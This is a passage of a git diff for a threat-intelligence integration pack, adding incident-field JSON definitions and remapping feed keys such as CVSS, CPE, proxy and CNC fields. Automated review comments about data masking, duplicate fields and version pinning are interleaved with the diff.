Threat Actors Table": { + "simple": "threatActor" + } + } + }, + "GIB Nation-State Cybercriminals Threat": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date Created At": { + "simple": "createdAt" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Date Published": { + "simple": "datePublished" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Is Tailored": { + "simple": "isTailored" + }, + "GIB Nation-State Cybercriminal Forums Table": { + "simple": "forumsAccounts" + }, + "GIB Nation-State Cybercriminals Threat Actor Labels": { + "simple": "labels" + }, + "GIB Nation-State Cybercriminals Threat Countries": { + "simple": "countries" + }, + "GIB Nation-State Cybercriminals Threat Description": { + "simple": "description" + }, + "GIB Nation-State Cybercriminals Threat Expertises": { + "simple": "expertise" + }, + "GIB Nation-State Cybercriminals Threat Langs": { + "simple": "langs" + }, + "GIB Nation-State Cybercriminals Threat Regions": { + "simple": "regions" + }, + "GIB Nation-State Cybercriminals Threat Report Number": { + "simple": "reportNumber" + }, + "GIB Nation-State Cybercriminals Threat Sectors": { + "simple": "sectors" + }, + "GIB Nation-State Cybercriminals Threat Title": { + "simple": "title" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actor Country": { + "simple": "threatActor.country" + }, + "GIB Threat Actor ID": { + "simple": "threatActor.id" + }, + "GIB Threat Actor Name": { + "simple": "threatActor.name" + }, + "GIB Threat Actor is APT": { + "simple": 
"threatActor.isAPT" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Nation-State Cybercriminals Threat Actor": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Date Created At": { + "simple": "createdAt" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Date Updated At": { + "simple": "updatedAt" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Nation-State Cybercriminals Expertises": { + "simple": "expertise" + }, + "GIB Nation-State Cybercriminals Malware": { + "simple": "malware" + }, + "GIB Nation-State Cybercriminals Regions": { + "simple": "regions" + }, + "GIB Nation-State Cybercriminals Sectors": { + "simple": "sectors" + }, + "GIB Nation-State Cybercriminals Threat Actor Aliases": { + "simple": "aliases" + }, + "GIB Nation-State Cybercriminals Threat Actor CVE": { + "simple": "cve" + }, + "GIB Nation-State Cybercriminals Threat Actor Country": { + "simple": "country" + }, + "GIB Nation-State Cybercriminals Threat Actor Description": { + "simple": "description" + }, + "GIB Nation-State Cybercriminals Threat Actor Goals": { + "simple": "goals" + }, + "GIB Nation-State Cybercriminals Threat Actor Labels": { + "simple": "labels" + }, + "GIB Nation-State Cybercriminals Threat Actor Reports Table": { + "simple": "reports" + }, + "GIB Nation-State Cybercriminals Threat Actor Roles": { + "simple": "roles" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Threat Actor Name": { + "simple": "threat_actor_name" + }, + "GIB Threat Actor is APT": { + "simple": "isAPT" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB OSI Vulnerability": { + "dontMapEventToLabels": false, + "internalMapping": { + "Description": { + "simple": "description" + }, + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Affected Software Table": { + "simple": 
"affectedSoftware" + }, + "GIB Bulletin Family": { + "simple": "bulletinFamily" + }, + "GIB CPE Table": { + "simple": "cpeTable" + }, + "GIB CVSS Score": { + "simple": "cvss.score" + }, + "GIB CVSS Vector": { + "simple": "cvss.vector" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Date Modified": { + "simple": "dateModified" + }, + "GIB Date Published": { + "simple": "datePublished" + }, + "GIB Extended CVSS Base": { + "simple": "extCvss.base" + }, + "GIB Extended CVSS Exploitability": { + "simple": "extCvss.exploitability" + }, + "GIB Extended CVSS Impact": { + "simple": "extCvss.impact" + }, + "GIB Extended CVSS Overall": { + "simple": "extCvss.overall" + }, + "GIB Extended CVSS Temporal": { + "simple": "extCvss.temporal" + }, + "GIB Extended Description": { + "simple": "extDescription" + }, + "GIB Has Exploit": { + "simple": "hasExploit" + }, + "GIB Href": { + "simple": "href" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Merged Cvss": { + "simple": "mergedCvss" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Reporter": { + "simple": "reporter" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Vulnerability Type": { + "simple": "type" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Suspicious IP Open Proxy": { + "dontMapEventToLabels": false, "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, "GIB Date of Detection": { - "complex": { - "accessor": "", - "filters": [], - "root": "date", - "transformers": [] - }, - 
"simple": "" + "simple": "dateDetected" }, "GIB ID": { - "complex": { - "accessor": "", - "filters": [], - "root": "id", - "transformers": [] - }, - "simple": "" + "simple": "id" }, - "GIB Inject Dump": { - "complex": { - "accessor": "", - "filters": [], - "root": "injectDump", - "transformers": [] - }, - "simple": "" + "GIB Portal Link": { + "simple": "portalLink" }, - "GIB Inject MD5": { - "complex": { - "accessor": "", - "filters": [], - "root": "injectMd5", - "transformers": [] - }, - "simple": "" + "GIB Proxy Port": { + "simple": "port" }, - "GIB Malware Name": { - "complex": { - "accessor": "name", - "filters": [], - "root": "malware", - "transformers": [] - }, - "simple": "" + "GIB Proxy Source": { + "simple": "source" + }, + "GIB Proxy Sources": { + "simple": "sources" + }, + "GIB Proxy Type": { + "simple": "type" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Suspicious IP Scanner": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB ID": { + "simple": "id" }, "GIB Portal Link": { - "complex": { - "accessor": "", - "filters": [], - "root": "portalLink", - "transformers": [] - }, - "simple": "" + "simple": "portalLink" }, "GIB Related Indicators Data": { - "complex": { - "accessor": "", - "filters": [], - "root": "relatedIndicatorsData", - "transformers": [] - }, - "simple": "" + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Scanner Categories": { + "simple": "categories" + }, + "GIB 
Scanner Sources": { + "simple": "sources" }, "GIB Severity": { - "complex": { - "accessor": "severity", - "filters": [], - "root": "evaluation", - "transformers": [] - }, - "simple": "" + "simple": "evaluation.severity" }, "GIB Source": { - "complex": { - "accessor": "", - "filters": [], - "root": "source", - "transformers": [] - }, - "simple": "" + "simple": "sourceType" }, - "GIB Threat Actor ID": { - "complex": { - "accessor": "id", - "filters": [], - "root": "threatActor", - "transformers": [] - }, - "simple": "" + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Suspicious IP Socks Proxy": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" }, - "GIB Threat Actor Name": { - "complex": { - "accessor": "name", - "filters": [], - "root": "threatActor", - "transformers": [] - }, - "simple": "" + "GIB Credibility": { + "simple": "evaluation.credibility" }, - "GIB Threat Actor is APT": { - "complex": { - "accessor": "isAPT", - "filters": [], - "root": "threatActor", - "transformers": [] - }, - "simple": "" + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Date of Detection": { + "simple": "dateDetected" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Socks Proxy Source": { + "simple": "source" + }, + "GIB Source": { + "simple": "sourceType" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Suspicious IP TOR Node": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date First Seen": { + "simple": 
"dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Suspicious IP VPN": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB VPN Names": { + "simple": "names" + }, + "GIB VPN Sources": { + "simple": "sources" }, "severity": { + "simple": "systemSeverity" + } + } + }, + "Indicator Feed": { + "dontMapEventToLabels": false, + "internalMapping": { + "Country": { "complex": { - "accessor": "", + "accessor": "[0]", "filters": [], - "root": "systemSeverity", + "root": "countries", "transformers": [] - }, - "simple": "" + } }, - "GIB Admiralty Code": { + "Target": { "complex": { - "accessor": "admiraltyCode", + "accessor": "[0]", "filters": [], - "root": "evaluation", + "root": "targetedCompany", "transformers": [] - }, - "simple": "" + } }, - "GIB Credibility": { + "name": { "complex": { - "accessor": "credibility", "filters": [], - "root": "evaluation", + "root": "title", "transformers": [] - }, - "simple": "" + } }, - "GIB Reliability": { + "severity": { "complex": { - "accessor": 
"reliability",
+ "accessor": "severity",
 "filters": [],
 "root": "evaluation",
 "transformers": []
- },
- "simple": ""
+ }
 }
 }
- },
- "dbot_classification_incident_type_all": {
- "dontMapEventToLabels": true,
- "internalMapping": {}
 }
 },
 "name": "Group-IB Threat Intelligence (mapper)",
 "type": "mapping-incoming",
 "version": -1,
 "fromVersion": "6.0.0"
-}
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json
new file mode 100644
index 000000000000..d5f44228f276
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json
@@ -0,0 +1,33 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB OSI Vulnerability"
+ ],
+ "caseInsensitive": true,
+ "cliName": "cpetable",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_cpetable",
+ "isReadOnly": false,
+ "locked": false,
+ "name": "CPE Table",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB OSI Vulnerability"
+ ],
+ "threshold": 72,
+ "type": "markdown",
+ "unmapped": false,
+ "unsearchable": true,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Address.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Address.json
index b80a2b346981..4bf9e87d1925 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Address.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Address.json
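Review bot: `GIB Compromised Card Group` maps `number`, `cvv` and `validThru` straight into `GIB Card Number`, `GIB CVV` and `GIB Card Valid Thru`, and `GIB Compromised Account Group` does the same for `password` — full cardholder data and clear-text credentials land in incident fields that get exported, indexed and shown in layouts. Unless the API already returns masked values (not visible in this patch), consider a transformer that keeps only the last four digits of the PAN and drops the CVV, which is the usual PCI DSS expectation for anything that stores this data, and keep the password fields `unsearchable`. Two smaller points: in `GIB Attacks Phishing Group` both `GIB Phishing Kit Source` and `GIB Phishing Sources` read the same `source` key, which looks copied from the Phishing Kit mapping (the other `*Sources` fields in this hunk read `sources`); and `GIB Malware` and `GIB Malware CNC` are the only new types without a `"severity": {"simple": "systemSeverity"}` entry, so those incidents will arrive at the default severity. `GIB Malware` also maps `taList.id`/`taList.name` into single-value fields while `taList` is used as a table elsewhere in the same mapping, so those two presumably receive a list rather than one value — confirm against a real event.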
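Review bot: This new `CPE Table` field (`id` `incident_cpetable`, `cliName` `cpetable`) is not referenced by the mapper in this patch — the `GIB OSI Vulnerability` mapping writes `cpeTable` into `GIB CPE Table`, and the diffstat lists a separate `incidentfield-GIB_CPE_Table.json`. It looks like a leftover duplicate; if no layout uses it, drop it, otherwise give it the `GIB` prefix like every other field in the pack so the generic `cpetable` cliName cannot collide with another pack's field. Its `fromVersion` is `6.10.0` while the mapper and the other fields in this patch are `6.0.0`; if the field stays, align the version or note why this one needs 6.10. Being a `markdown`-typed field that is filled from feed content, it should be fed only through a mapper you control, since whatever the feed returns is rendered as markdown on the incident.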
@@ -27,5 +27,12 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Brand Protection Domain",
+ "GIB Compromised Account",
+ "GIB Compromised Card"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Admiralty_Code.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Admiralty_Code.json
index f4d78db0a5ec..922c200950c4 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Admiralty_Code.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Admiralty_Code.json
@@ -8,7 +8,22 @@
 "GIB Data Breach",
 "GIB OSI Git Leak",
 "GIB OSI Public Leak",
- "GIB Targeted Malware"
+ "GIB Targeted Malware",
+ "GIB Compromised Account Group",
+ "GIB Compromised Card Group",
+ "GIB Compromised Mule",
+ "GIB OSI Vulnerability",
+ "GIB Attacks DDOS",
+ "GIB Attacks Deface",
+ "GIB Attacks Phishing Group",
+ "GIB Attacks Phishing Kit",
+ "GIB Suspicious IP TOR Node",
+ "GIB Suspicious IP Open Proxy",
+ "GIB Suspicious IP VPN",
+ "GIB Suspicious IP Scanner",
+ "GIB Cybercriminal Threat",
+ "GIB Suspicious IP Socks Proxy",
+ "GIB Nation-State Cybercriminals Threat"
 ],
 "caseInsensitive": false,
 "cliName": "gibadmiraltycode",
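Review bot: `"itemVersion": "1.4.2"` is hard-coded in the new lines here and repeated in the Admiralty Code, CVV, Card Issuer/Number/Type/Valid Thru, Compromised Login and Credibility hunks, while several files created by this same commit (CPE Table, GIB Affected Software Table, GIB CPE Table, GIB Compromised Account, both Compromised Events tables) omit it. If the server fills itemVersion from the pack version at install time, pinning it in source will go stale at the next pack bump, and the inconsistency suggests the files were exported from different server states. The added `systemAssociatedTypes` array also repeats `associatedTypes` verbatim in every one of those hunks (the same 23 entries appear twice in both Admiralty Code and Credibility), so the two lists now have to be edited together; it would be worth confirming that the content validator expects this key in pack source rather than only in server exports, and dropping it if not.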
@@ -33,5 +48,32 @@
 "unsearchable": true,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
-}
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Brand Protection Phishing",
+ "GIB Brand Protection Phishing Kit",
+ "GIB Compromised Account",
+ "GIB Compromised Card",
+ "GIB Data Breach",
+ "GIB OSI Git Leak",
+ "GIB OSI Public Leak",
+ "GIB Targeted Malware",
+ "GIB Compromised Account Group",
+ "GIB Compromised Card Group",
+ "GIB Compromised Mule",
+ "GIB OSI Vulnerability",
+ "GIB Attacks DDOS",
+ "GIB Attacks Deface",
+ "GIB Attacks Phishing Group",
+ "GIB Attacks Phishing Kit",
+ "GIB Suspicious IP TOR Node",
+ "GIB Suspicious IP Open Proxy",
+ "GIB Suspicious IP VPN",
+ "GIB Suspicious IP Scanner",
+ "GIB Cybercriminal Threat",
+ "GIB Suspicious IP Socks Proxy",
+ "GIB Nation-State Cybercriminals Threat"
+ ]
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Affected_Software_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Affected_Software_Table.json
new file mode 100644
index 000000000000..f939dd33f8b1
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Affected_Software_Table.json
@@ -0,0 +1,80 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibaffectedsoftwaretable", + "closeForm": true, + "columns": [ + { + "displayName": "Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "name", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Operator", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "operator", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Version", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "version", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibaffectedsoftwaretable", + "isReadOnly": false, + "locked": false, + "name": "GIB Affected Software Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Bulletin_Family.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Bulletin_Family.json new file mode 100644 index 000000000000..082594ee0aa4 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Bulletin_Family.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibbulletinfamily", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibbulletinfamily", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Bulletin Family", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC.json new file mode 100644 index 000000000000..c82029172a2c --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibcnc", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcnc", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB CNC", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Domain.json new file mode 100644 index 000000000000..912a21b0ef2b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Domain.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibcncdomain", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcncdomain", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB CNC Domain", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Port.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Port.json new file mode 100644 index 000000000000..09229fc1798a --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Port.json 
@@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibcncport", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcncport", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB CNC Port", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_URL.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_URL.json new file mode 100644 index 000000000000..06f39dc0aa02 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_URL.json @@ -0,0 +1,38 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware CNC", + "GIB Malware", + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibcncurl", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcncurl", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB CNC URL", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware CNC", + "GIB Malware", + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "url", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
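Review bot: `GIB CNC URL` is declared with `"type": "url"` whereas the sibling `GIB CNC` and `GIB CNC Domain` fields added just above are `shortText`; if the incident layout renders url-typed fields as clickable links, an analyst can open a live command-and-control address straight from the incident page. Unless the integration defangs the value before it reaches this field, `"type": "shortText"` (as used for `GIB CNC`) or a defanged value is the safer choice here. The hunk also associates the field with `GIB Malware CNC` and `GIB Malware`, two incident types that appear nowhere else in the visible part of this commit, so it is worth confirming they exist in the pack before the association is relied on.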
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CPE_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CPE_Table.json new file mode 100644 index 000000000000..bb22ebec1ddc --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CPE_Table.json 
@@ -0,0 +1,119 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibcpetable", + "closeForm": true, + "columns": [ + { + "displayName": "Product", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "product", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "String", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "string", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "String23", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "string23", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Type", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "type", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 173 + }, + { + "displayName": "Vendor", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "vendor", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Version", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "version", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcpetable", + "isReadOnly": false, + "locked": false, + "name": "GIB CPE Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + 
"all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Score.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Score.json new file mode 100644 index 000000000000..b6706f6700be --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Score.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibcvssscore", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcvssscore", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB CVSS Score", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Vector.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Vector.json new file mode 100644 index 000000000000..e5450a47ef02 --- /dev/null +++ 